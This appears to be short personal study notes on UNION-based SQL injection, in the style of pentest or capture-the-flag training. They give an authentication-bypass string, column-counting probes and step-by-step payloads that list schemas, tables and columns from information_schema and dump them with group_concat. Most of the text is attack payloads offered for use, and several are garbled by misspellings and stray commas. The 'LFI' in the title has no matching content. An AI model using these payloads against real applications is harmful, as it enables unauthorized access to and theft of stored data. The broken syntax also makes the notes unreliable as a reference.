SQL & LFI
if you find a SQL vuln in an application, try UNION injection
if the basic "admin'-- -" is possible, that means the query will look like
SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'
so everything after WHERE is possible
In this example below, we've got ID, Name, Position, Phone No, and Email data
Try doing admin' UNION SELECT NULL,NULL,.... -- - to see any weird behaviors. (data breaking, byte changes) with burp
or do admin' ORDER BY 1, ORDER BY 2.....
If it breaks that means it can only handle the number before the error.
Now, we can extract useful data from the database!
extract data from columns, tables
- 1.UNION SELECT SCHEMANAME,2,3,4,5,6 FROM information_schema.schemata -- -
if you can't extract multiple data at once, try
'UNION SELECT groupconcat(SCHEMANAME),2,3,4,5,6, FROM information_schema.schemata-- -
What tables are in user database?
group_contat(TABLE_NAME) FROM information_schema.tables where table_schema = "Staff"-- -
Once we know table names, try to extract data from columns
grou_concat(COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff"-- -
displaying table and columns names
grou_concat(TABLE_NAME,":",COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff" and table_name ="Users"-- -